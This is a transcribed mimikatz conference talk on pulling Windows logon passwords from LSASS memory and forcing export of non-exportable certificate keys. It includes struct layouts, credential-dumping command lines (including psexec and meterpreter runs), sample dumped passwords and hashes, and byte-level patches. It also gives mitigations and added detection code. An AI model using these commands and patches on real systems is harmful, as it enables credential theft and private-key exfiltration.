    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz # sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz # sekurlsa :: kerberos / « hu ? »
Ok. It works…
But why?
Not at all logons on NT5 (an unlock can be needed).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
• password hash for shared secret, but keeping password in memory
– For full smartcard auth:
• No password on client
• No hash on client
– NTLM hash on client…
– KDC sent it back as a gift
mimikatz # sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too and “imports” the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
LsaUnprotectMemory
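The slide above describes the two ways the tool reaches LSASS secrets: injecting sekurlsa.dll (the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread mode from the start of the deck) and, later, just reading LSASS memory. Both start with a handle to lsass.exe opened with a telling access mask, which is what a defender can watch for. The block below is an added example, not code from the slides or from mimikatz: it classifies process-access records by the rights requested on lsass.exe and flags the ones worth an alert. It assumes records shaped like Sysmon event ID 10 (SourceImage, TargetImage, GrantedAccess fields), a constructed allowlist of images that legitimately read lsass, and constructed sample records; the access-right values are the winnt.h constants.

```python
# Added example (not from the slides): classify handle opens on lsass.exe
# by the process access rights requested, the way a detection rule over
# process-access telemetry (e.g. Sysmon event ID 10) would.

# Process access rights, values as defined in winnt.h.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Rights needed for remote-thread injection (allocate, write, create thread)
# and for the injection-free mode (read the process memory).
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
READ_MASK = PROCESS_VM_READ
QUERY_MASK = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION

LSASS_IMAGE = r"c:\windows\system32\lsass.exe"

# Constructed allowlist (assumption): images expected to read lsass memory
# on this system. Tune it from a baseline of your own telemetry.
ALLOWED_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def classify(record: dict) -> str:
    """Return 'inject', 'read', 'query' or 'other' for one access record.

    'inject' means every right needed to write and run code in lsass was
    granted; 'read' means memory can be read; 'query' covers the harmless
    information queries that task managers and monitors make."""
    if record["TargetImage"].lower() != LSASS_IMAGE:
        return "other"
    granted = int(record["GrantedAccess"], 16)
    if granted & INJECT_MASK == INJECT_MASK:
        return "inject"
    if granted & READ_MASK:
        return "read"
    if granted & QUERY_MASK:
        return "query"
    return "other"


def alerts(records) -> list:
    """Records that deserve an alert: every inject-capable open, and every
    read-capable open from an image that is not on the allowlist."""
    found = []
    for record in records:
        kind = classify(record)
        source = record["SourceImage"]
        if kind == "inject" or (kind == "read" and source.lower() not in ALLOWED_READERS):
            found.append((source, kind, record["GrantedAccess"]))
    return found


# Constructed sample records, not real telemetry.
SAMPLE_RECORDS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\demo\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Users\demo\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x143A"},
    {"SourceImage": r"C:\Users\demo\tool.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for source, kind, mask in alerts(SAMPLE_RECORDS):
        print(f"ALERT {kind:6s} {mask:>8s} {source}")
```

The mask 0x1010 (VM_READ plus QUERY_LIMITED_INFORMATION) is exactly what the injection-free reading mode needs, so it is classified as a read even though it looks modest; the allowlist, not the mask alone, decides whether it is normal on a given host.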
mimikatz # sekurlsa :: LsaEncryptMemory / NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Keys in lsass (lsasrv.dll), copied by mimikatz into its own loaded lsasrv.dll (from the slide diagram):
g_cbRandomKey : DWORD (256)
g_pRandomKey  : BYTE[g_cbRandomKey]
g_pDESXKey    : BYTE[144]
g_Feedback    : BYTE[8]
mimikatz # sekurlsa :: LsaEncryptMemory / NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Keys in lsass (lsasrv.dll), copied by mimikatz (from the slide diagram):
InitializationVector : BYTE[16]
h3DesKey, hAesKey    : key handles, each pointing to a KIWI_BCRYPT_KEY whose cle member points to the KIWI_BCRYPT_KEY_DATA
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz # sekurlsa :: memo
Security Packages
Package        | Symbols                                               | Type
tspkg          | tspkg!TSGlobalCredTable                               | RTL_AVL_TABLE
wdigest        | wdigest!l_LogSessList                                 | LIST_ENTRY
livessp        | livessp!LiveGlobalLogonSessionList                    | LIST_ENTRY
kerberos (nt5) | kerberos!KerbLogonSessionList                         | LIST_ENTRY
kerberos (nt6) | kerberos!KerbGlobalLogonSessionTable                  | RTL_AVL_TABLE
msv1_0         | lsasrv!LogonSessionList, lsasrv!LogonSessionListCount | LIST_ENTRY, ULONG
Protection Keys
Key  | NT 5 Symbols
RC4  | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx | lsasrv!g_pDESXKey, lsasrv!g_Feedback
Key  | NT 6 Symbols
IV   | lsasrv!InitializationVector
3DES | lsasrv!h3DesKey
AES  | lsasrv!hAesKey
mimikatz # sekurlsa :: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp : n.t. (LUID KO)
mimikatz # sekurlsa :: what we can do?
Basics:
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless!)
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
• biometrics (it keeps the password somewhere and pushes it to Windows)
• single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take every opportunity to stop backward compatibility
– Disable faulty providers:
• Is it supported by Microsoft?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz # crypto :: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
• Even those which are “not” exportable
What the crypto module can do:
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
– public, in DER format
– with private keys, in PFX format
• Private keys in PVK format
– it's cool, OpenSSL can deal with it too
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again!)
(module: mod_mimikatz_crypto)
mimikatz # crypto :: how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
• At least, not without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a “session”
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Slide callouts: a constraint for most users; unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz # crypto :: capi / how it works?
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz # crypto :: capi / how it's exported? (… level)
Flow (from the slide diagram, entirely inside the calling process):
Process -> Ask to export Key -> CryptoAPI and RSA CSP -> Load Private Key (DPAPI decode) -> Exportable?
– yes: Exported Key
– no: NTE_BAD_KEY_STATE
(The slide labels this flow “PLAYSKOOL”.)
mimikatz # crypto :: patch capi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
certutil output for the same certificate:
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz # crypto :: patch capi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote “4” bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz # crypto :: patch capi / demo time
Import, export, import as not exportable… export!
mimikatz # crypto :: patch capi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real life use
• Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz # crypto :: cng / how it works?
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context.
Processes use RPC to call “Key isolation service” (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz # crypto :: cng / how it's exported? (… level)
Flow (from the slide diagram):
Process -> Ask to export Key -> CNG -> RPC -> KeyIso Service (LSASS process) -> Load Private Key (DPAPI decode) -> Exportable?
– yes: Exported Key
– no: NTE_NOT_SUPPORTED
On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP
(The slide labels this flow “PLAYSKOOL” too.)
mimikatz # crypto :: patch cng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG :
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz # crypto :: patch cng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz # crypto :: patch cng / demo time
Import, export, import as not exportable… export again!
mimikatz # crypto :: patch cng / limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz # crypto :: patch cng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz # crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
• So yes, mimikatz can export it
mimikatz # crypto :: what we can do?
Exactly the same as for sekurlsa: what prevents access to accounts / computer
– no admin, no admin, no admin…
Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with the TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
mimikatz # what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz # that's all folks!
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
mimikatz # Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz # sekurlsa :: history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
• http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz, it dumps clear text passwords from WDigest provider (unlimited this time ;))
• http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 – Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 – Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
• http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
• http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
• http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all (ultra safe)
• http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz # sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz # sekurlsa :: tspkg / what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
– http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool!
– User does not have to type their password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz # sekurlsa :: tspkg / questions
The KB says that for it to work, we must enable « Default credentials » delegation
– “Default credentials: The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
• What? Our User/Domain/Password? | Hash? | Ticket? It seems…
– In all cases, the system seems to be vulnerable to pass-the-…
In what form? Our specs [MS-CSSP]:
– 2.2.1.2.1 TSPasswordCreds
• The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
TSPasswordCreds ::= SEQUENCE {
    domainName  [0] OCTET STRING,
    userName    [1] OCTET STRING,
    password    [2] OCTET STRING
}
– Challenge response for authentication?
• Server: YES (TLS, Kerberos)
• Client: NO, password is sent to server…
So the password resides somewhere in memory!
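To make the point of the slide concrete (the delegated credential carries the password itself, not a hash), here is an added example, not code from the slides or from [MS-CSSP]: a minimal DER encoder and decoder for the TSPasswordCreds SEQUENCE quoted above. It assumes the three OCTET STRINGs hold UTF-16LE text (CredSSP's Unicode convention, an assumption stated here rather than on the slide) and uses constructed sample values.

```python
# Added example (not from the slides): DER encode/decode of the
# TSPasswordCreds SEQUENCE from [MS-CSSP] 2.2.1.2.1.
#   TSPasswordCreds ::= SEQUENCE {
#       domainName [0] OCTET STRING,
#       userName   [1] OCTET STRING,
#       password   [2] OCTET STRING }
# Assumption: field contents are UTF-16LE text.


def _der_length(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(value)) + value


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Each field is an EXPLICIT context tag [n] wrapping an OCTET STRING."""
    fields = []
    for index, text in enumerate((domain, user, password)):
        octet_string = _tlv(0x04, text.encode("utf-16-le"))
        fields.append(_tlv(0xA0 | index, octet_string))  # [index], constructed
    return _tlv(0x30, b"".join(fields))                  # SEQUENCE


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element); reject truncation."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length


_FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def decode_ts_password_creds(blob: bytes) -> dict:
    """Parse one TSPasswordCreds and return its three fields as text."""
    tag, body, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("not a single TSPasswordCreds SEQUENCE")
    fields, pos = {}, 0
    while pos < len(body):
        ctag, cbody, pos = _read_tlv(body, pos)
        if (ctag & 0xE0) != 0xA0 or (ctag & 0x1F) not in _FIELD_NAMES:
            raise ValueError("unexpected tag 0x%02x" % ctag)
        otag, ovalue, oend = _read_tlv(cbody, 0)
        if otag != 0x04 or oend != len(cbody):
            raise ValueError("field is not a single OCTET STRING")
        fields[_FIELD_NAMES[ctag & 0x1F]] = ovalue.decode("utf-16-le")
    if set(fields) != set(_FIELD_NAMES.values()):
        raise ValueError("missing field in TSPasswordCreds")
    return fields


def password_in_clear(blob: bytes, password: str) -> bool:
    """True when the password bytes appear verbatim inside the encoding."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    # Constructed sample credential.
    blob = encode_ts_password_creds("CONTOSO", "alice", "S3cret!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password visible in the structure:", password_in_clear(blob, "S3cret!"))
```

The structure is only ever sent inside the TLS channel CredSSP sets up, so this is not what goes on the wire in the clear; the point is that the client side must hold the password to build it, which is why tspkg keeps it.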
mimikatz # sekurlsa :: tspkg / symbols & theory
Let's explore some symbols:
– sounds cool… (thanks Microsoft)
Let's imagine a scenario:
– Enumerate all sessions to obtain:
• Username
• Domain
• LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain:
• TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
• TS_PRIMARY_CREDENTIAL with clear text credentials…
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz # sekurlsa :: tspkg / workflow
Workflow (from the slide diagram): LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear.
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz # sekurlsa :: tspkg / demo time
sekurlsa::tspkg
mimikatz # sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz # sekurlsa :: wdigest / what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]”
Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP”
Microsoft: http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool!
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
• Only with Advanced Digest authentication
mimikatz # sekurlsa :: wdigest / what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
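The slide's argument is that HA1 depends on a realm the client only learns from each server's challenge, so a provider that must answer any server needs the password, not a stored hash. The block below is an added example, not code from the slides: it computes the RFC 2617 digest values with the slide's HA1/HA2 notation, using the RFC's own published example values (Mufasa / testrealm@host.com / Circle Of Life) and a constructed second realm to show that one cached HA1 does not transfer between realms.

```python
# Added example (not from the slides): RFC 2617 Digest computation, to show
# why a client answering challenges from several servers needs the password
# (or one HA1 per realm), which is the reason WDigest keeps it in memory.
import hashlib


def _md5_hex(*parts: str) -> str:
    """MD5 over the colon-joined parts, the building block of RFC 2617."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm comes from the server."""
    return _md5_hex(username, realm, password)


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI), the qop=auth form."""
    return _md5_hex(method, digest_uri)


def digest_response(username, realm, password, nonce, method, digest_uri,
                    nc="00000001", cnonce="0a4f113b", qop="auth"):
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), RFC 2617 with qop=auth."""
    return _md5_hex(ha1(username, realm, password), nonce, nc, cnonce, qop,
                    ha2(method, digest_uri))


def ha1_per_realm(username, password, realms):
    """One HA1 per realm: a cached HA1 for realm A is useless for realm B,
    so without the password the client can only answer realms it saw before."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # Values from the RFC 2617 section 3.5 example.
    print(digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                          "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET",
                          "/dir/index.html"))
    # The second realm is constructed: the two HA1 values differ.
    print(ha1_per_realm("Mufasa", "Circle Of Life",
                        ["testrealm@host.com", "other.example"]))
```

Advanced Digest (the "hashes for each realm" on the previous slide) is the server-side answer to the same dependency: the directory stores a precomputed HA1 per realm, which only works because the set of realms is known in advance, something a client talking to arbitrary servers cannot assume.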
mimikatz # sekurlsa :: wdigest / theory
This time we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
